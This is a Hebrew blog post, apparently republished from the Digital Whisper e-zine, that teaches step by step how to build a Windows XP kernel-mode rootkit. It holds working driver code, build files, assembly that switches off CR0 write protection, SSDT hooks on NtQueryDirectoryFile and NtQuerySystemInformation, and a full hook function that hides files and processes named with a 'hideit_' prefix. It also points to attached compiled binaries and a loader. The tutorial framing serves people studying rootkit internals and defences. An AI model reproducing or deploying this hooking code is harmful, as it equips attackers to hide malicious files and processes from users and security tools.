רוטקיט ברמת הקרנל

מאמר מתוך Digital Whisper המדגים כתיבת Rootkit ב-Kernel-Mode

אתמול בלילה שוחרר גיליון נוסף של Digital Whisper, גיליון מספר 21, ובו ארבעה מאמרים על פונקציות קריפטוגרפיות, פיתוח מאובטח, התקפה על AppArmor של לינוקס ומאמר שלי על כתיבת רוטקיט ברמת הקרנל שאני מפרסם גם כאן.

לאחר קרבות מתישים עם העורך המעיק של WordPress שמחליט פתאום להעלים קטעים שלמים הכנסתי את המאמר לפוסט. אני מקווה שלא החסרתי משהו, כדאי לקרוא במגזין עצמו 🙂

צוות DW מחפש אנשים שיתנו כתף, קראו בבלוג: http://www.digitalwhisper.co.il/0x45/

הקדמה

כהמשך ישיר למאמר מהגליון הקודם, Userland Rootkits, אציג במאמר זה את ה-Kernel-Mode Rootkit. נבנה Rootkit שמסתירה קבצים ותהליכים. רצוי מאוד לקרוא את המאמר מהגליון הקודם לפני קריאת מאמר זה.

לחצו על "המשך לקרוא" להמשך המאמר.

אחזור בקצרה על מספר נקודות עיקריות:

 • Rootkit היא תוכנה שיושבת בין התוכנות הרצות במערכת לבין מערכת ההפעלה ומסננת כל מידע העובר דרכה. לדוגמה, Rootkit המשתלטת על פעולתן של פונקציות API המחזירות רשימת קבצים ומוודאת שהקבצים שהיא רוצה להסתיר (בדרך כלל הקבצים של עצמה) לא נמצאים שם. כך הרוטקיט יכולה להסתיר את עצמה מהמשתמש.
 • במאמר הקודם הדגמנו Rootkit ב-Ring 3 או User-Mode, ובמאמר זה נדגים Rootkit ב-Ring 0 או Kernel-Mode – Rootkit הרצה ברמה הנמוכה ביותר, באותה רמה של הקרנל. ההבדל הגדול הוא שב-User-Mode קל מאוד לגלות את ה-Rootkit ואפשר למצוא דרכים קלות לעקוף אותה. לעומת זאת, Rootkit הרצה ב-Kernel-Mode היא שקופה לחלוטין לתוכנות שרצות ב-User-Mode מכיוון שאין לתוכנות הרשאה לגשת למרחב הזיכרון של ה-Kernel, שבו רצה ה-Rootkit. כאשר תוכנה מבקשת, לדוגמא, רשימת קבצים, הבקשה מגיעה למערכת ההפעלה ושם ה-Rootkit לוקח את הבקשה, מטפל בה בעצמו ומחזיר לתוכנה, כאשר מבחינת התוכנה מערכת ההפעלה היא זו שענתה. היא לא יכולה לדעת שיש תוכנה באמצע שחיבלה בערך המוחזר.

ובכל זאת יש חיסרון ב-Kernel-Mode Rootkits. כל טעות קטנה עלולה לגרום לקריסת המערכת ול-BSOD הידוע לשמצה, ולכן צריך זהירות רבה בעת כתיבה של Rootkit כזה. רצוי להריץ אותו בתוך VM (כדוגמת VirtualBox או VMWare) כי מספיקה טעות קטנה כדי להקריס את מערכת ההפעלה.

אז איך זה עובד?

ישנן טכניקות רבות לכתיבת Rootkit ב-Kernel-Mode, בחרתי באופציה הנוחה והנפוצה ביותר. להרחבה כדאי לקרוא את שני חלקי המאמר של אורי השני (Zerith (; ) על Rootkits מגיליונות שש ושבע (חלק ראשון וחלק שני).

המטרה שלנו היא להשתלט על כל הקריאות מה-User-Mode לפונקציית API מסוימת, כדוגמת: NtQueryDirectoryFile המיועדת לקבלת מידע\רשימת קבצים, ולטפל בקריאה בעצמנו – לקרוא לפונקציה המקורית, למחוק מהרשימה המוחזרת את הקבצים שאנו רוצים להסתיר ולהחזיר את הרשימה לתוכנה שקראה לפונקציה. לפני שנסביר איך עושים את זה נסביר איך עובדת קריאה לפונקציות API.

כאשר תוכנה קוראת ל-FindFirstFile, הקריאה מגיעה אל Kernel32.dll שם הוא קורא ל-Ntdll.dll שקורא ל-NtQueryDirectoryFile. המעבר בין Ntdll.dll שהוא ב-User-Mode אל NtQueryDirectoryFile שהיא ב-Kernel-Mode הוא המעניין אותנו.

נבקש מ-WinDbg את קוד האסמבלי של הקריאה ל-NtQueryDirectoryFile:

0:000> U NtQueryDirectoryFile
ntdll!ZwQueryDirectoryFile:
7c90d76e b891000000 mov   eax,91h
7c90d773 ba0003fe7f mov   edx,offset SharedUserData!SystemCallStub (7ffe0300)
7c90d778 ff12 call  dword ptr [edx]
7c90d77a c22c00 ret   2Ch
7c90d77d 90 nop
0:000> dd 7ffe0300
7ffe0300 7c90e510 7c90e514 00000000 00000000
0:000> U 7c90e510
ntdll!KiFastSystemCall:
7c90e510 8bd4      mov   edx,esp
7c90e512 0f34      sysenter

בשורה הראשונה של NtQueryDirectoryFile מכניסים את המספר 91h לתוך EAX שהוא מספר הפונקציה, או השירות, שאנו רוצים להריץ, לאחר מכן קוראים ל- KiFastSystemCall(בעזרת [edx]) ששם הפקודה sysenter מריצה את השירות ב-Kernel-Mode.

איך היא עושה את זה? הפקודה מעבירה את המעבד ל-Kernel-Mode או Ring 0, וקוראת ל-KiFastCallEntry מתוך הקרנל שהולכת לרשומה המתאימה ב-SSDT, במקרה שלנו רשומה מספר 91h, ומשם מקבלת את כתובת השירות במרחב הזיכרון של הקרנל וקופצת אליו (הסבר מפורט והדגמה – http://www.osronline.com/article.cfm?id=257).

SSDT הן ראשי התיבות של System Service Dispatch Table, או טבלת "שיגור" שירותי מערכת. היא בעצם רשימה של הכתובות של כל פונקציות ה-API שאפשר לקרוא להן מה-User-Mode. כך, כאשר קוראים לפונקציה NtQueryDirectoryFile לדוגמה, Ntdll.dll יודע שהיא פונקציה מספר 91h ושולח את המספר ב-EAX בעזרת sysenter (דרך הפונקציה KiFastSystemCall). פקודה זו קופצת ל- KiFastCallEntry ב-Kernel-Mode ולוקחת את המספר ועל פיו מוצאת את כתובת השירות ב-SSDT וקופצת אליו. אפשר לראות את התהליך קצת מופשט בתרשים הבא:

מנחשים כבר מה צריך לעשות? בדומה למה שעשינו במאמר הקודם עם IAT Hooking, מה שנצטרך לעשות זה לשנות את הכתובת של הפונקציה NtQueryDirectoryFile בטבלת ה-SSDT מהכתובת המקורית אל הכתובת של הפונקציה החלופית ב-Rootkit שלנו – או במילים אחרות – SSDT Hooking. בפונקציה החלופית נקרא לפונקציה המקורית, נמחק מהרשימה את הקבצים שאנו רוצים להסתיר ונחזיר את התוצאה. פשוט!

הערה קצרה: בגרסאות 64-bit של Windows יש הגנה על ה-SSDT בשם Patch Guard, ולכן נעבוד על מערכת 32-bit. הקוד נוסה על Windows XP SP3 ולא גרם לשום BSOD 🙂

הכנות

כדי להריץ קוד ברמת ה-Kernel נצטרך לכתוב דרייבר. בפרק זה אסביר איך מקמפלים דרייבר ואיך טוענים אותו. כתיבה והידור של דרייבר בסיסי זו פעולה פשוטה מאוד, אבל למאמר זה מצורפים גם קבצים מהודרים, כך שאין חובה לבצע שלבים אלה.

בשלב הראשון יש להוריד את Windows Driver Kit. התקינו אותו בנתיב ללא רווחים (אני בחרתי את C:\WinDDK\). עכשיו נכתוב את הדרייבר.

פתחו קובץ חדש בשם entry.c (או כל שם אחר), וכתבו את הקוד הבא:

#include <ntddk.h>

void DriverUnload(PDRIVER_OBJECT pDriverObject);
NTSTATUS DriverEntry(PDRIVER_OBJECT DriverObject, PUNICODE_STRING RegistryPath)
{
  DriverObject->DriverUnload = DriverUnload;
  DbgPrint("Driver Loaded!");
  return STATUS_SUCCESS;
}

void DriverUnload(PDRIVER_OBJECT pDriverObject)
{
  DbgPrint("Driver Unloaded!");
}

אנו משתמשים בקובץ Header בשם ntddk כדי לכתוב את הדרייבר. כתבנו שתי פונקציות.

 • הראשונה היא DriverEntry שתקרא ברגע שהדרייבר ייטען, דומה ל-main בתוכנות או DllMain.
 • הפונקציה השנייה DriverUnload היא הפונקציה הנקראת ברגע שהדרייבר מתבקש להסגר. DriverUnload אינה חובה, אבל אם לא נכתוב אותה ניסיון כיבוי של הדרייבר יחזיר שגיאה שאי-אפשר לכבותו, ונאלץ לעשות הפעלה מחדש של ה-Windows כדי לכבות אותו.
  (למרות שלפעמים זו דווקא אופציה טובה במקרה של Rootkit (: )
 • בשורה הראשונה ב-DriverEntry אנו מגדירים, דרך ה-DriverObject שמכיל מידע אודות הדרייבר, איזו פונקציה תקרא כאשר מתבצעת סגירה לדרייבר. כדי שנוכל לראות שהדרייבר פועל אנו משתמשים ב-DbgPrint.

  לפני ההידור יש לבצע הכנה קטנה. צרו קובץ בשם MAKEFILE והכניסו את השורה הבאה:

  !INCLUDE $(NTMAKEENV)\makefile.def

  את השורה הזו לא נשנה, היא תמיד תישאר אותו הדבר. את ההגדרות של הדרייבר קובעים בקובץ בשם SOURCES:

  TARGETNAME = rootkit
  TARGETPATH = obj
  TARGETTYPE = DRIVER
  INCLUDES = %BUILD%\inc
  LIBS = %BUILD%\lib
  SOURCES = entry.c

  ב-TARGETNAME אנו מכניסים את שם הדרייבר שאנו בוחרים וב-SOURCES את רשימת קבצי המקור (קבצי C).

  בכדי לקמל היכנסו ל-WDK\Build Environments\Windows XP\x86 Checked Build Environment שנמצא בתפריט התחל (השתמשו ב-Free Build כדי לקמפל ללא בדיקות, מתאים למוצר הסופי). זה הוא ממשק CLI המוגדר כבר עבור כלי הפיתוח של הדרייברים. עברו לתיקיה שבה קוד המקור יושב בעזרת הפקודה cd ופשוט כתבו build – הפקודה תקמפל את הדרייבר לתוך תת תיקיה בקובץ בשם rootkit.sys. זה הכל, יש לנו דרייבר מהודר.

  לאחר שהידרנו את הדרייבר הגיע הזמן להריץ אותו. אנו נריץ אותו כ-Service, ונעשה את זה בעזרת ה-Loader המצורף. קוד ה-Loader לא ממש מעניין ולכן לא נעבור עליו אלא רק נסביר בקצרה. ה-Loader מתחיל ב-OpenSCManager כדי לקבל Handle שעליה הוא יעשה את הפעולות, לאחר מכן הוא יוצר את ה-Service של הדרייבר שלנו על ידי CreateService ולאחר מכן ב-OpenService ו-StartService כדי להפעיל אותו. הוא משתמש ב-ControlService כדי להפסיק את הדרייבר ולאחר מכן ב-DeleteService כדי למחוק אותו.

  הערה: כאשר הוא מתקין את הדרייבר הוא מתקין אותו עם הדגל SERVICE_DEMAND_START, מה שאומר שהדרייבר לא יופעל אוטומטית. כך, גם אם הדרייבר גורם לקריסת המערכת, הוא לא יופעל אוטומטית בהפעלה הבאה ויהיה אפשר לבטלו.

  קמפלו את הפרויקט או השתמשו בקבצים המהודרים, וודאו שהקבצים המהודרים install.exe ו-uninstall.exe נמצאים באותה תיקיה של ה-rootkit.sys.

  כדי לוודא שהוא באמת פועל, הפעילו את DebugView של SysInternals והפעילו את Capture Kernel ו-Enable Verbose Kernel Output מתפריט Capture. הפעילו והפסיקו את הדרייבר בעזרת install ו-uninstall וצפו בהודעות שמופיעות ב-DebugView. הדרייבר פועל!

  ועכשיו, כשיש לנו דרייבר פועל נשאר לנו להפוך אותו ל-Rootkit אמיתי.

  Write Protection

  כמו שאמרנו בהתחלה המטרה היא לעשות SSDT Hooking, אך לפני שנוכל לעשות זאת יש לבטל את ההגנה על ה-SSDT. אזור הזיכרון של ה-SSDT מוגן לכתיבה, אפילו ב-Kernel-Mode. אבל אם ה-Kernel יכול לכתוב ואנו באותה הדרגה של ה-Kernel, גם אנחנו יכולים, פשוט נצטרך להוריד את ההגנה. יש כמה שיטות לבצע זאת, בחרתי את הקצרה והפשוטה ביותר (אבל אולי לא תמיד הכי מומלצת…). כדי לקרוא על עוד שיטות חפשו בגוגל (לדוגמה http://www.ivanlef0u.tuxfamily.org/?p=63).

  CR0, ראשי התיבות של Control Register 0, הוא אוגר המכיל כמה דגלים, אחד מהם מייצג האם ישנה הגנה נגד כתיבה או לא. נכבה אותו בעזרת Masking בקוד אסמבלי:

  void deprotect()
  {
    __asm
    {
      push eax // Save EAX
      mov eax, CR0 // Put CR0 contents into EAX
      and eax, 0FFFEFFFFh // Turn off write protection
      mov CR0, eax // Put back the value after the modifications
      pop eax // Load former EAX value
    }
  }

  הפונקציה להחזרת ההגנה מאוד דומה ואפשר לראות אותה בקוד המקור המצורף (protection.h).

  אחרי שכיבינו את ההגנה אפשר, סוף סוף, לעשות את ה-Hook עצמו:

  NTSTATUS DriverEntry(PDRIVER_OBJECT DriverObject, PUNICODE_STRING RegistryPath)
  {
    DriverObject->DriverUnload = DriverUnload;
    
    deprotect();
    origNtQueryDirectoryFile = InterlockedExchange((PLONG)&SYSTEMSERVICE(ZwQueryDirectoryFile), (LONG)NewNtQueryDirectoryFile);
    origNtQuerySystemInformation = InterlockedExchange((PLONG)&SYSTEMSERVICE(ZwQuerySystemInformation), (LONG)NewNtQuerySystemInformation);
    protect();
    
    DbgPrint("Rootkit loaded, SSDT entries are hooked.\n");
    
    return STATUS_SUCCESS;
  }
  
  void DriverUnload(PDRIVER_OBJECT pDriverObject)
  {
    deprotect();
    InterlockedExchange((PLONG)&SYSTEMSERVICE(ZwQueryDirectoryFile), (LONG)origNtQueryDirectoryFile);
    InterlockedExchange((PLONG)&SYSTEMSERVICE(ZwQuerySystemInformation), (LONG)origNtQuerySystemInformation);
    protect();
      
    DbgPrint("Rootkit unloaded, SSDT entries are unhooked.\n");
  }
  

  יש לנו שתי פונקציות – DriverEntry שנקראת כאשר הדרייבר מופעל ו-DriverUnload שנקראת כאשר הדרייבר נסגר. כמו שאפשר לראות, בשתי הפונקציות אנו קודם כל מורידים את ההגנה – deprotect() (שאת הקוד שלה ראינו קודם) – ובסוף מחזירים את ההגנה – protect().

  לפני שנסביר איך ההוק עובד שימו לב שאנו עושים הוק לשתי פונקציות: ZwQueryDirectoryFile עבור החבאת קבצים ו-ZwQuerySystemInformation עבור החבאת תהליכים.

  הקוד קצת מורכב, נסביר אותו חלק חלק:

  • NewNtQueryDirectoryFile היא הפונקצייה החלופית שתרוץ במקום NtQueryDirectoryFile המקורית.
  • InterlockedExchange לוקחת ערך ומכניסה אותו לכתובת מסוימת, ואת מה שהיה שם לפני ההשמה היא מחזירה. בעצם במקום השורה:
   origNtQueryDirectoryFile = InterlockedExchange((PLONG)&SYSTEMSERVICE(ZwQueryDirectoryFile), (LONG)NewNtQueryDirectoryFile);

   אפשר היה לכתוב:

   origNtQueryDirectoryFile = &SYSTEMSERVICE(ZwQueryDirectoryFile);
   SYSTEMSERVICE(ZwQueryDirectoryFile) = NewNtQueryDirectoryFile;

   ההבדל הוא ש-InterlockedExchange עושה את הפעולות הללו באטומיות (Atomicity) כדי למנוע בעיות מכיוון שהקרנל היא Multi-Threaded. בכל מקרה אפשר גם לכתוב את שתי השורות החלופיות – לא סביר שזה יגרום לבעיות.

  • שימו לב לכך שישנן שתי גרסאות של אותה פונקציה. יש את NtQueryDirectoryFile ויש את ZwQueryDirectoryFile. גרסת ה-Nt היא הגרסה "הרגילה" הנקראת מה-User-Mode. לעומת זאת, גרסת ה-Zw נגישה רק ב-Kernel-Mode והיא עושה כמה פעולות ולאחר מכן קוראת לגרסת ה-Nt. בפעולות אלה היא מסמנת שהקריאה לגרסת ה-Nt של הפונקציה נעשתה מ-Kernel-Mode ולכן הפונקציה תניח תקינות הפרמטרים ולא תעשה בדיקות מיותרות, להרחבה:
   http://www.osronline.com/article.cfm?id=257
   הדבר החשוב ביותר הוא להבין את היחס בינהן, ש-Nt זו הפונקציה עצמה ו-Zw קוראת ל-Nt.

  • נקודה קצת מורכבת. אנחנו צריכים את מיקום הפונקציה ב-SSDT כדי להחליף את הכתובת. ננצל את העובדה שגרסת ה-Zw קוראת לגרסת ה-Nt כדי לקבל את המספר. נסתכל ב-Disassembly של ZwQueryDirectoryFile:
   lkd> U ZwQueryDirectoryFile
   nt!ZwQueryDirectoryFile:
   804dd210 b891000000 mov eax, 91h
   804dd215 8d542404 lea edx, [esp+4]

   כמו שאפשר לראות הפקודה הראשונה היא הכנסה של מספר הפונקציה ב-SSDT ל-EAX אז ניקח משם את המספר. זה בדיוק מה שהמאקרו SYSTEMSERVICE עושה. זו הגדרתו (מתוך ssdt.h בקוד המקור):

   #define SYSTEMSERVICE(_func) KeServiceDescriptorTable.ServiceTableBase[*(PULONG)((PUCHAR)_func+1)]

   הוא הולך לבייט השני בפקודה הראשונה, ועל פי המספר שכתוב שם הוא הולך ל-SSDT, כמו שאפשר לראות בתרשים:

  לסיכום, נסתכל על הקוד פעם נוספת:

  origNtQueryDirectoryFile = InterlockedExchange((PLONG)&SYSTEMSERVICE(ZwQueryDirectoryFile), (LONG)NewNtQueryDirectoryFile);

  אנו לוקחים את כתובת הפונקציה החלופית ומכניסים אותה למיקום ב-SSDT של גרסת ה-Nt של ZwQueryDirectoryFile ואת הכתובת המקורית אנו מכניסים לתוך origNtQueryDirectoryFile. באותו עיקרון אנו גם מחזירים את הערך המקורי כשהדרייבר נסגר, ב-DriverUnload:

  InterlockedExchange((PLONG)&SYSTEMSERVICE(ZwQueryDirectoryFile), (LONG)origNtQueryDirectoryFile);

  זהו, עשינו הוק ועכשיו כל קריאה אל NtQueryDirectoryFile תגיע אל NewNtQueryDirectoryFile, וכל קריאה אל NtQuerySystemInformation תגיע אל NewNtQuerySystemInformation שבדרייבר שלנו, בשליטתנו. עכשיו נסביר את קוד הפונקציה החלופית – NewNtQueryDirectoryFile.

  NewNtQueryDirectoryFile

  נצלול קצת לקוד – על מנת להבין טוב יותר מה קורה. ראשית נסתכל בהגדרה של NtQueryDirectoryFile ב-MSDN (ופה ובכל מקום אחר באינטרנט). היא מקבלת פרמטרים רבים, נסביר את החשובים לנו:

  • IoStatusBlock – מחזיר האם הייתה הקריאה הצליחה או לא, ואם כן, מה גודל המידע המוחזר. (נצטרך לשנות את גודל המידע אם נקטין את הרשימה על ידי החבאת קובץ.)
  • FileInformation, Length – הפוינטר לחוצץ (Buffer, איזור בזיכרון שמי שקרא לפונקציה הקצה במיוחד) וגודלו ששם המידע יישמר.
  • FileInformationClass – סוג המידע שהוא מבקש. (נסנן רק סוג מידע שעלול להחזיר את הקבצים שאנו רוצים להסתיר.)
  • ReturnSingleEntry – האם מי שקרא לפונקציה מבקש לקבל רק קובץ אחד.
  • RestartScan – האם זה בקשה חדשה, או המשך של קריאה קודמת אל NtQueryDirectoryFile.

  על פי המידע שבוקש ב-FileInformationClass יוחזר מערך, או יותר נכון רשימה מקושרת, שתוכנס ל-FileInformation. בתחילת FileInformation יהיה את האיבר הראשון. האיבר הראשון יגיד לנו איפה (יצביע על) האיבר השני במאפיין NextEntryOffset, האיבר השני יצביע על האיבר השלישי, וכן הלאה, עד שהמאפיין NextEntryOffset יהיה שווה לאפס ואז זה אומר שהגענו לאיבר האחרון.

  הרעיון הוא לקרוא לפונקציה המקורית, ואז לעבור על איברי הרשימה אחד אחד, ואם צריך להסתיר אותו – נעשה את אחד הדברים הבאים תלוי במצב:

  • אם הוא הראשון והאחרון (היחיד), בדוק אם יש עוד קובץ אחר או שתחזיר שאין קבצים
  • אם הוא הראשון ולא האחרון, העתק את כל האיברים שאחריו אל המקום שבו הוא היה (דרוס אותו, מחק אותו)
  • אם הוא לא הראשון אבל הוא האחרון, סמן את האיבר הקודם כסוף הרשימה
  • אם הוא לא הראשון ולא האחרון (איפה שהוא באמצע), הגדר שהאיבר הקודם יצביע על האיבר הבא (דילוג על הנוכחי).

  עכשיו נסתכל במימוש בפועל:

  NTSTATUS NewNtQueryDirectoryFile(
   __in   HANDLE FileHandle,
   __in_opt HANDLE Event,
   __in_opt PIO_APC_ROUTINE ApcRoutine,
   __in_opt PVOID ApcContext,
   __out   PIO_STATUS_BLOCK IoStatusBlock,
   __out   PVOID FileInformation,
   __in   ULONG Length,
   __in   FILE_INFORMATION_CLASS FileInformationClass,
   __in   BOOLEAN ReturnSingleEntry,
   __in_opt PUNICODE_STRING FileName,
   __in   BOOLEAN RestartScan
  )
  {
    NTSTATUS ret;
    
    // Call original function
    ret = origNtQueryDirectoryFile(FileHandle, Event, ApcRoutine, ApcContext, IoStatusBlock, FileInformation, Length, FileInformationClass, ReturnSingleEntry, FileName, RestartScan);
    
    // If call did not succeeded no need to filter, just return as-is
    if (!NT_SUCCESS(ret))
      return ret;
    
    // Filter only if the information has to be filtered
    if ((FileInformationClass == FileBothDirectoryInformation ||
      FileInformationClass == FileDirectoryInformation ||
      FileInformationClass == FileFullDirectoryInformation ||
      FileInformationClass == FileIdBothDirectoryInformation ||
      FileInformationClass == FileIdFullDirectoryInformation ||
      FileInformationClass == FileNamesInformation) &&
      IoStatusBlock->Information > 0) // and if there is any information at all
    {
      PWCHAR fileName;
      ULONG fileNameLength;
      PGENERAL_INFORMATION ptr = (PGENERAL_INFORMATION)FileInformation, lastPtr = NULL;
      
      do
      {
        // Get the filename from the current struct
        GetFileName(FileInformationClass, ptr, &fileName, &fileNameLength);
        
        // If it needs to be hidden (starting with 'hideit_')
        if (fileNameLength >= FILE_HIDE_LEN && memcmp(fileName, FILE_HIDE, FILE_HIDE_LEN) == 0)
        {
          UNICODE_STRING us;
          us.Length = us.MaximumLength = fileNameLength;
          us.Buffer = fileName;
          DbgPrint("Hiding file %wZ", &us);
          
          if (lastPtr == NULL && ptr->NextEntryOffset == 0) // First item, last item
          {
            if (ReturnSingleEntry)
            {
              ret = ZwQueryDirectoryFile(
                      FileHandle,
                      Event,
                      ApcRoutine,
                      ApcContext,
                      IoStatusBlock,
                      FileInformation,
                      Length,
                      FileInformationClass,
                      TRUE,
                      FileName,
                      FALSE
                   );
              return ret;
            }
            else
            {
              IoStatusBlock->Status = STATUS_NO_MORE_FILES;
              IoStatusBlock->Information = 0;
              return STATUS_NO_MORE_FILES;
            }
          }
          else if (lastPtr == NULL && ptr->NextEntryOffset != 0) // First item, NOT last item
          {
            memmove(ptr, (PUCHAR)ptr + ptr->NextEntryOffset, Length - ptr->NextEntryOffset);
            IoStatusBlock->Information -= ptr->NextEntryOffset;
          }
          else if (lastPtr != NULL && ptr->NextEntryOffset == 0) // NOT first item, last item
          {
            lastPtr->NextEntryOffset = 0;
            break;
          }
          else // NOT first item, NOT last item
          {
            lastPtr->NextEntryOffset += ptr->NextEntryOffset;
            ptr = (PUCHAR)ptr + ptr->NextEntryOffset;
          }
        }
        else
        {
          lastPtr = ptr;
          ptr = (PUCHAR)ptr + ptr->NextEntryOffset;
        }
      } while (lastPtr->NextEntryOffset != 0);
    }
    
    return ret;
  }

  כתבתי הערות, קראו את הקוד והשוו בין ארבעת המצבים השונים לבין ה-if עם ארבעת החלקים.

  אותו הדבר בדיוק עשיתי עם הסתרת תהליכים, שם גם יש רשימה מקושרת שצריך להוריד איברים ממנה. הסתכלו בקוד processHider.h ו-processHider.c כדי לראות בדיוק איך זה נעשה.

  הפעלת ה-Rootkit

  זה הכל, קמפלו את הדרייבר על פי ההסבר בתחילת המאמר או השתמשו בקבצים המהודרים המצורפים למאמר זה. שימו את ה-rootkit.sys , install.exe ו-uninstall.exe באותה התיקייה, ולחצו פעמיים על install.exe. כל הקבצים והתהליכים ששמם מתחיל ב-hideit_ יעלמו. ברגע שתלחצו על uninstall.exe פעולתו של ה-Rootkit תופסק והקבצים והתהליכים יראו שוב. ה-Kernel-Mode Rootkit עובד!

  לקריאה נוספת

  האינטרנט מלא בחומר בנושאים אלו. הטכניקות שהשתמשתי בהן כאן הן רק אחדות מהאפשרויות הרבות. גוגל הוא חברכם הטוב ביותר.

  רשימת מקורות נוספים, בחלקם השתמשתי בכתיבת המאמר:

  סיכום

  אז מה היה לנו? יצרנו דרייבר והשתמשנו ב-Loader כדי לטעון אותו. בעזרת הדרייבר הורדנו את ההגנה על ה-SSDT שהיא טבלת כתובות הפונקציות. עשינו הוק ל-NtQueryDirectoryFile כדי להסתיר קבצים והוק ל-NtQuerySystemInformation כדי להסתיר תהליכים.

  מצורפים קבצים מהודרים של הדרייבר וה-Loader. בתיקיה Loader יש את קוד המקור של install.exe ו-uninstall.exe ובתיקיה Driver את קוד המקור של ה-Rootkit עצמה:

  MAKEFILE, SOURCES – ההסבר במאמר
  entry.c – הקובץ הראשי של הדרייבר
  protection.h – הורדת והחזרת הגנת הכתיבה
  ssdt.h – מכיל את הגדרת מבנה ה-SSDT
  filesHider.h, filesHider.c – הפונקציה החלופית NewNtQueryDirectoryFile
  processHider.h, processHider.c – הפונקציה החלופית NewNtQuerySystemInformation

  Kernel-Mode_Rootkit.zip

  אם יש לכם הערות אשמח לשמוע.

קטגוריות: אבטחת מידע, מערכות הפעלה
תגיות: , , ,
פורסם בתאריך 2nd יוני 2011 ע"י vbCrLf